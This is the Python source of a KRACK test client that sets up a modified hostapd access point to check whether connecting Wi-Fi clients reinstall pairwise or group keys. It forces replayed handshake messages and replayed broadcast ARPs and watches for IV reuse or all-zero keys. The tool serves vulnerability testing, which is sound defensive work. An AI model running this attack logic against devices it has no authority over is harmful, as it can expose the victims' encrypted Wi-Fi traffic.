krack-test-client.py 23 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580
  1. #!/usr/bin/env python2
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. import libwifi
  11. from libwifi import *
  12. import sys, socket, struct, time, subprocess, atexit, select, os.path
  13. from wpaspy import Ctrl
  14. # FIXME:
  15. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  16. # - We should test decryption using an all-zero key, and warn if this seems to succeed
  17. # Future work:
  18. # - Detect if the client reinstalls an all-zero encryption key (wpa_supplicant v2.4 and 2.5)
  19. # - Ability to test the group key handshake against specific clients only
  20. # - Individual test to see if the client accepts replayed broadcast traffic (without performing key reinstallation)
  21. # After how many seconds a new message 3, or new group key message 1, is sent.
  22. # This value must match the one in `../src/ap/wpa_auth.c` (same variable name).
  23. HANDSHAKE_TRANSMIT_INTERVAL = 2
  24. #### Utility Commands ####
  25. def hostapd_command(hostapd_ctrl, cmd):
  26. rval = hostapd_ctrl.request(cmd)
  27. if "UNKNOWN COMMAND" in rval:
  28. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  29. quit(1)
  30. return rval
  31. #### Main Testing Code ####
  32. class TestOptions():
  33. ### XXX should be grouphs instead of groupkey
  34. ReplayBroadcast, ReplayUnicast, Fourway, Groupkey = range(4)
  35. TptkNone, TptkReplay, TptkRand = range(3)
  36. def __init__(self, variant=Fourway):
  37. self.variant = variant
  38. # Additional options for Fourway tests
  39. self.tptk = TestOptions.TptkNone
  40. # Extra option for Fourway and GroupKey tests
  41. self.gtkinit = False
  42. class ClientState():
  43. UNKNOWN, VULNERABLE, PATCHED = range(3)
  44. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  45. def __init__(self, clientmac, options):
  46. self.mac = clientmac
  47. self.options = options
  48. self.TK = None
  49. self.vuln_4way = ClientState.UNKNOWN
  50. self.vuln_group = ClientState.UNKNOWN
  51. # FIXME: Separate variable for group handshake result?
  52. self.ivs = IvCollection()
  53. self.pairkey_sent_time_prev_iv = None
  54. self.pairkey_intervals_no_iv_reuse = 0
  55. self.groupkey_reset()
  56. def groupkey_reset(self):
  57. self.groupkey_state = ClientState.IDLE
  58. self.groupkey_prev_canary_time = 0
  59. self.groupkey_num_canaries = 0
  60. self.groupkey_requests_sent = 0
  61. self.groupkey_patched_intervals = -1 # -1 because the first broadcast ARP requests are still valid
  62. # TODO: Put in libwifi?
  63. def get_encryption_key(self, hostapd_ctrl):
  64. if self.TK is None:
  65. # Clear old replies and messages from the hostapd control interface
  66. while hostapd_ctrl.pending():
  67. hostapd_ctrl.recv()
  68. # Contact our modified Hostapd instance to request the pairwise key
  69. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  70. if not "FAIL" in response:
  71. self.TK = response.strip().decode("hex")
  72. return self.TK
  73. # TODO: Put in libwifi?
  74. def decrypt(self, p, hostapd_ctrl):
  75. payload = get_ccmp_payload(p)
  76. llcsnap, packet = payload[:8], payload[8:]
  77. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  78. # On some kernels, the virtual interface associated to the real AP interface will return
  79. # frames where the payload is already decrypted (this happens when hardware decryption is
  80. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  81. plaintext = payload
  82. else:
  83. key = self.get_encryption_key(hostapd_ctrl)
  84. plaintext = decrypt_ccmp(p, key)
  85. # If it still fails, try an all-zero key
  86. if not plaintext.startswith("\xAA\xAA\x03\x00\x00\x00"):
  87. plaintext = decrypt_ccmp(p, "\x00" * 16)
  88. return plaintext
  89. def track_used_iv(self, p):
  90. return self.ivs.track_used_iv(p)
  91. def is_iv_reused(self, p):
  92. return self.ivs.is_iv_reused(p)
  93. def check_pairwise_reinstall(self, p):
  94. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  95. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  96. if self.ivs.is_iv_reused(p):
  97. if self.vuln_4way != ClientState.VULNERABLE:
  98. iv = dot11_get_iv(p)
  99. seq = dot11_get_seqnum(p)
  100. log(INFO, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  101. "Client reinstalls the pairwise key in the 4-way handshake (this is bad)") % (self.mac, iv, seq), color="green")
  102. self.vuln_4way = ClientState.VULNERABLE
  103. # If it's a higher IV than all previous ones, try to check if the client seems patched
  104. elif self.vuln_4way == ClientState.UNKNOWN and self.ivs.is_new_iv(p):
  105. # Save how many intervals we received a data packet without IV reset. Use twice the
  106. # transmission interval of message 3, in case one message 3 is lost due to noise.
  107. if self.pairkey_sent_time_prev_iv is None:
  108. self.pairkey_sent_time_prev_iv = p.time
  109. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  110. self.pairkey_intervals_no_iv_reuse += 1
  111. self.pairkey_sent_time_prev_iv = p.time
  112. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  113. # If during several intervals all IV reset attempts failed, the client is likely patched.
  114. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  115. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  116. self.vuln_4way = ClientState.PATCHED
  117. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  118. msg = "%s: client DOESN'T reinstall the pairwise key in the 4-way handshake (this is good)"
  119. if self.options.tptk == TestOptions.TptkNone:
  120. msg += " (used standard attack)"
  121. elif self.options.tptk == TestOptions.TptkReplay:
  122. msg += " (used TPTK attack)"
  123. elif self.options.tptk == TestOptions.TptkRand:
  124. msg += " (used TPTK-RAND attack)"
  125. log(INFO, (msg + ".") % self.mac, color="green")
  126. def mark_allzero_key(self, p):
  127. if self.vuln_4way != ClientState.VULNERABLE:
  128. iv = dot11_get_iv(p)
  129. seq = dot11_get_seqnum(p)
  130. log(INFO, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  131. "Client (re)installs an all-zero key in the 4-way handshake (this is very bad)") % (self.mac, iv, seq), color="green")
  132. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this vulnerability first !!!" % self.mac)
  133. self.vuln_4way = ClientState.VULNERABLE
  134. def broadcast_print_patched(self):
  135. if self.options.variant in [TestOptions.Fourway, TestOptions.Groupkey]:
  136. hstype = "group key" if self.options.variant == TestOptions.Groupkey else "4-way"
  137. if self.options.gtkinit:
  138. log(INFO, "%s: Client installs the group key in the %s handshake with the given replay counter (this is good)" % (self.mac, hstype), color="green")
  139. else:
  140. log(INFO, "%s: Client DOESN'T reinstall the group key in the %s handshake (this is good)" % (self.mac, hstype), color="green")
  141. if self.options.variant == TestOptions.ReplayBroadcast:
  142. log(INFO, "%s: Client DOESN'T accept replayed broadcast frames (this is good)" % self.mac, color="green")
  143. def broadcast_print_vulnerable(self):
  144. if self.options.variant in [TestOptions.Fourway, TestOptions.Groupkey]:
  145. hstype = "group key" if self.options.variant == TestOptions.Groupkey else "4-way"
  146. if self.options.gtkinit:
  147. log(INFO, "%s: Client installs the group key in the %s handshake with a zero replay counter (this is bad)" % (self.mac, hstype), color="green")
  148. else:
  149. log(INFO, "%s: Client reinstalls the group key in the %s handshake (this is bad)" % (self.mac, hstype), color="green")
  150. log(INFO, " Or client accepts replayed broadcast frames (%d replies to replayed broadcast ARPs)" % \
  151. self.groupkey_num_canaries, color="green")
  152. if self.options.variant == TestOptions.ReplayBroadcast:
  153. log(INFO, "%s: Client accepts replayed broadcast frames (this is bad)" % self.mac, color="green")
  154. log(INFO, " Fix this before testing for group key (re)installations!", color="green")
  155. def broadcast_process_reply(self, p):
  156. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  157. # Must be testing this client, and must not be a benign retransmission
  158. if not self.groupkey_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  159. if self.groupkey_prev_canary_time + 1 > p.time: return
  160. self.groupkey_num_canaries += 1
  161. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.groupkey_num_canaries))
  162. # We wait for several replies before marking the client as vulnerable, because
  163. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  164. if self.groupkey_num_canaries >= 5:
  165. assert self.vuln_group != ClientState.VULNERABLE
  166. self.vuln_group = ClientState.VULNERABLE
  167. self.groupkey_state = ClientState.FINISHED
  168. self.broadcast_print_vulnerable()
  169. # Remember that we got a reply this interval (see broadcast_check_replies to detect patched clients)
  170. else:
  171. self.groupkey_state = ClientState.GOT_CANARY
  172. self.groupkey_prev_canary_time = p.time
  173. def broadcast_check_replies(self):
  174. """Track when we send broadcast ARP requests, and determine if a client seems patched"""
  175. if self.groupkey_state == ClientState.IDLE:
  176. return
  177. if self.groupkey_requests_sent == 4:
  178. # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
  179. if self.groupkey_state == ClientState.GOT_CANARY:
  180. log(DEBUG, "%s: got a reply to broadcast ARPs during this interval" % self.mac)
  181. self.groupkey_state = ClientState.STARTED
  182. # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
  183. elif self.groupkey_state == ClientState.STARTED:
  184. self.groupkey_patched_intervals += 1
  185. log(DEBUG, "%s: didn't get reply received to broadcast ARPs during this interval" % self.mac)
  186. self.groupkey_state = ClientState.STARTED
  187. self.groupkey_requests_sent = 0
  188. # If the client appears secure for several intervals (see above), it's likely patched
  189. if self.groupkey_patched_intervals >= 5 and self.vuln_group == ClientState.UNKNOWN:
  190. self.vuln_group = ClientState.PATCHED
  191. self.groupkey_state = ClientState.FINISHED
  192. self.broadcast_print_patched()
  193. class KRAckAttackClient():
  194. def __init__(self):
  195. # Parse hostapd.conf
  196. self.script_path = os.path.dirname(os.path.realpath(__file__))
  197. try:
  198. interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
  199. except Exception as ex:
  200. log(ERROR, "Failed to parse the hostapd.conf config file")
  201. raise
  202. if not interface:
  203. log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
  204. quit(1)
  205. # Set other variables
  206. self.nic_iface = interface
  207. self.nic_mon = interface + "mon"
  208. self.options = None
  209. try:
  210. self.apmac = scapy.arch.get_if_hwaddr(interface)
  211. except:
  212. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  213. raise
  214. self.sock_mon = None
  215. self.sock_eth = None
  216. self.hostapd = None
  217. self.hostapd_ctrl = None
  218. self.dhcp = None
  219. self.group_ip = None
  220. self.group_arp = None
  221. self.clients = dict()
  222. def reset_client_info(self, clientmac):
  223. if clientmac in self.dhcp.leases:
  224. self.dhcp.remove_client(clientmac)
  225. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  226. if clientmac in self.clients:
  227. del self.clients[clientmac]
  228. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  229. def handle_replay(self, p):
  230. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  231. function processes these frames manually so we can still test reinstallations of the group key."""
  232. if not Dot11WEP in p: return
  233. # Reconstruct Ethernet header
  234. clientmac = p.addr2
  235. header = Ether(dst=self.apmac, src=clientmac)
  236. header.time = p.time
  237. # Decrypt the payload and obtain LLC/SNAP header and packet content
  238. client = self.clients[clientmac]
  239. plaintext = client.decrypt(p, self.hostapd_ctrl)
  240. llcsnap, packet = plaintext[:8], plaintext[8:]
  241. # Rebuild the full Ethernet packet
  242. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  243. decap = header/ARP(packet)
  244. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  245. decap = header/IP(packet)
  246. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  247. decap = header/IPv6(packet)
  248. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  249. # # EAPOL
  250. else:
  251. return
  252. # Now process the packet as if it were a valid (non-replayed) one
  253. self.process_eth_rx(decap)
  254. def handle_mon_rx(self):
  255. p = self.sock_mon.recv()
  256. if p == None: return
  257. if p.type == 1: return
  258. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  259. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  260. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  261. # The first bit in FCfield is set if the frames is "to-DS"
  262. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  263. if apmac != self.apmac: return None
  264. # Reset info about disconnected clients
  265. if Dot11Deauth in p or Dot11Disas in p:
  266. self.reset_client_info(clientmac)
  267. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  268. elif p.addr1 == self.apmac and Dot11WEP in p:
  269. if not clientmac in self.clients:
  270. self.clients[clientmac] = ClientState(clientmac, options=options)
  271. client = self.clients[clientmac]
  272. iv = dot11_get_iv(p)
  273. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  274. if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
  275. client.mark_allzero_key(p)
  276. if self.options.variant == TestOptions.Fourway:
  277. client.check_pairwise_reinstall(p)
  278. if client.is_iv_reused(p):
  279. self.handle_replay(p)
  280. client.track_used_iv(p)
  281. def process_eth_rx(self, p):
  282. self.dhcp.reply(p)
  283. self.group_arp.reply(p)
  284. clientmac = p[Ether].src
  285. if not clientmac in self.clients: return
  286. client = self.clients[clientmac]
  287. if ARP in p and p[ARP].pdst == self.group_ip:
  288. client.broadcast_process_reply(p)
  289. def handle_eth_rx(self):
  290. p = self.sock_eth.recv()
  291. if p == None or not Ether in p: return
  292. self.process_eth_rx(p)
  293. def broadcast_send_request(self, client):
  294. clientip = self.dhcp.leases[client.mac]
  295. # Print a message when we start testing the client --- XXX this should be in the client?
  296. if client.groupkey_state == ClientState.IDLE:
  297. hstype = "group key" if self.options.variant == TestOptions.Groupkey else "4-way"
  298. log(STATUS, "%s: client has IP address -> testing for group key reinstallation in the %s handshake" % (client.mac, hstype))
  299. client.groupkey_state = ClientState.STARTED
  300. # Send a new handshake message when testing the group key handshake
  301. if self.options.variant == TestOptions.Groupkey:
  302. cmd = "RESEND_GROUP_M1 " + client.mac
  303. cmd += "maxrsc" if self.options.gtkinit else ""
  304. hostapd_command(self.hostapd_ctrl, cmd)
  305. # Send a replayed broadcast ARP request to the client
  306. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
  307. self.sock_eth.send(request)
  308. client.groupkey_requests_sent += 1
  309. log(INFO, "%s: sending broadcast ARP to %s from %s (sent %d ARPs this interval)" % (client.mac,
  310. clientip, self.group_ip, client.groupkey_requests_sent))
  311. def configure_interfaces(self):
  312. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  313. # 0. Some users may forget this otherwise
  314. subprocess.check_output(["rfkill", "unblock", "wifi"])
  315. # 1. Remove unused virtual interfaces to start from a clean state
  316. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  317. # 2. Configure monitor mode on interfaces
  318. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  319. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  320. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  321. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  322. time.sleep(0.5)
  323. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  324. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  325. def run(self, options):
  326. self.options = options
  327. self.configure_interfaces()
  328. # Open the patched hostapd instance that carries out tests and let it start
  329. log(STATUS, "Starting hostapd ...")
  330. try:
  331. self.hostapd = subprocess.Popen([
  332. os.path.join(self.script_path, "../hostapd/hostapd"),
  333. os.path.join(self.script_path, "hostapd.conf")]
  334. + sys.argv[1:])
  335. except:
  336. if not os.path.exists("../hostapd/hostapd"):
  337. log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
  338. raise
  339. time.sleep(1)
  340. try:
  341. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  342. self.hostapd_ctrl.attach()
  343. except:
  344. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  345. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  346. raise
  347. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  348. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  349. # Let scapy handle DHCP requests
  350. self.dhcp = DHCP_sock(sock=self.sock_eth,
  351. domain='krackattack.com',
  352. pool=Net('192.168.100.0/24'),
  353. network='192.168.100.0/24',
  354. gw='192.168.100.254',
  355. renewal_time=600, lease_time=3600)
  356. # Configure gateway IP: reply to ARP and ping requests
  357. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  358. # Use a dedicated IP address for our broadcast ARP requests and replies
  359. self.group_ip = self.dhcp.pool.pop()
  360. self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
  361. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  362. # Monitor both the normal interface and virtual monitor interface of the AP
  363. self.next_arp = time.time() + 1
  364. while True:
  365. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  366. if self.sock_mon in sel[0]: self.handle_mon_rx()
  367. if self.sock_eth in sel[0]: self.handle_eth_rx()
  368. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  369. if time.time() > self.next_arp:
  370. # When testing if the replay counter of the group key is properly installed, always install
  371. # a new group key. Otherwise KRACK patches might interfere with this test.
  372. # Otherwise just reset the replay counter of the current group key.
  373. if self.options.variant in [TestOptions.Fourway, TestOptions.Groupkey] and self.options.gtkinit:
  374. hostapd_command(self.hostapd_ctrl, "RENEW_GTK")
  375. else:
  376. hostapd_command(self.hostapd_ctrl, "RESET_PN FF:FF:FF:FF:FF:FF")
  377. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  378. for client in self.clients.values():
  379. # 1. Test the 4-way handshake. We rely on an encrypted message 4 as reply to detect pairwise
  380. # key reinstallations reinstallations.
  381. if self.options.variant == TestOptions.Fourway and client.vuln_4way != ClientState.VULNERABLE:
  382. # First inject a message 1 if requested using the TPTK option
  383. if self.options.tptk == TestOptions.TptkReplay:
  384. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac)
  385. elif self.options.tptk == TestOptions.TptkRand:
  386. hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")
  387. hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac + ("maxrsc" if self.options.gtkinit else ""))
  388. # 2. Test if broadcast ARP request are accepted by the client. Keep injecting even
  389. # to PATCHED clients (just to be sure they keep rejecting replayed frames).
  390. if self.options.variant in [TestOptions.Fourway, TestOptions.Groupkey, TestOptions.ReplayBroadcast]:
  391. # 2a. Check if we got replies to previous requests (and determine if vulnerable)
  392. client.broadcast_check_replies()
  393. # 2b. Send new broadcast ARP requests (and handshake messages if needed)
  394. if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  395. self.broadcast_send_request(client)
  396. def stop(self):
  397. log(STATUS, "Closing hostapd and cleaning up ...")
  398. if self.hostapd:
  399. self.hostapd.terminate()
  400. self.hostapd.wait()
  401. if self.sock_mon: self.sock_mon.close()
  402. if self.sock_eth: self.sock_eth.close()
  403. def cleanup():
  404. attack.stop()
  405. def argv_get_interface():
  406. for i in range(len(sys.argv)):
  407. if not sys.argv[i].startswith("-i"):
  408. continue
  409. if len(sys.argv[i]) > 2:
  410. return sys.argv[i][2:]
  411. else:
  412. return sys.argv[i + 1]
  413. return None
  414. def argv_pop_argument(argument):
  415. if not argument in sys.argv: return False
  416. idx = sys.argv.index(argument)
  417. del sys.argv[idx]
  418. return True
  419. def hostapd_read_config(config):
  420. # Read the config, get the interface name, and verify some settings.
  421. interface = None
  422. with open(config) as fp:
  423. for line in fp.readlines():
  424. line = line.strip()
  425. if line.startswith("interface="):
  426. interface = line.split('=')[1]
  427. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  428. if "TKIP" in line:
  429. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  430. log(ERROR, " >%s<" % line, showtime=False)
  431. quit(1)
  432. # Parameter -i overrides interface in config.
  433. # FIXME: Display warning when multiple interfaces are used.
  434. if argv_get_interface() is not None:
  435. interface = argv_get_interface()
  436. return interface
  437. if __name__ == "__main__":
  438. if "--help" in sys.argv or "-h" in sys.argv:
  439. print "\nSee README.md for usage instructions. Accepted parameters are"
  440. print "\n\t" + "\n\t".join(["--replay-broadcast", "--group", "--tptk", "--tptk-rand", "--gtkinit", "--debug"]) + "\n"
  441. quit(1)
  442. options = TestOptions()
  443. # Parse the type of test variant to execute
  444. replay_broadcast = argv_pop_argument("--replay-broadcast")
  445. replay_unicast = argv_pop_argument("--replay-unicast")
  446. groupkey = argv_pop_argument("--group")
  447. fourway = argv_pop_argument("--fourway")
  448. if replay_broadcast + replay_unicast + fourway + groupkey > 1:
  449. print "You can only select one argument of out replay-broadcast, replay-unicast, fourway, and group"
  450. quit(1)
  451. if replay_broadcast:
  452. options.variant = TestOptions.ReplayBroadcast
  453. elif replay_unicast:
  454. options.variant = TestOptions.ReplayUnicast
  455. elif groupkey:
  456. options.variant = TestOptions.Groupkey
  457. else:
  458. options.variant = TestOptions.Fourway
  459. # Parse options for the 4-way handshake
  460. tptk = argv_pop_argument("--tptk")
  461. tptk_rand = argv_pop_argument("--tptk-rand")
  462. if tptk + tptk_rand > 1:
  463. print "You can only select one argument of out tptk and tptk-rand"
  464. quit(1)
  465. if tptk:
  466. options.tptk = TestOptions.TptkReplay
  467. elif tptk_rand:
  468. options.tptk = TestOptions.TptkRand
  469. else:
  470. options.tptk = TestOptions.TptkNone
  471. # Parse remaining options
  472. options.gtkinit = argv_pop_argument("--gtkinit")
  473. while argv_pop_argument("--debug"):
  474. libwifi.global_log_level -= 1
  475. # Now start the tests
  476. attack = KRAckAttackClient()
  477. atexit.register(cleanup)
  478. attack.run(options=options)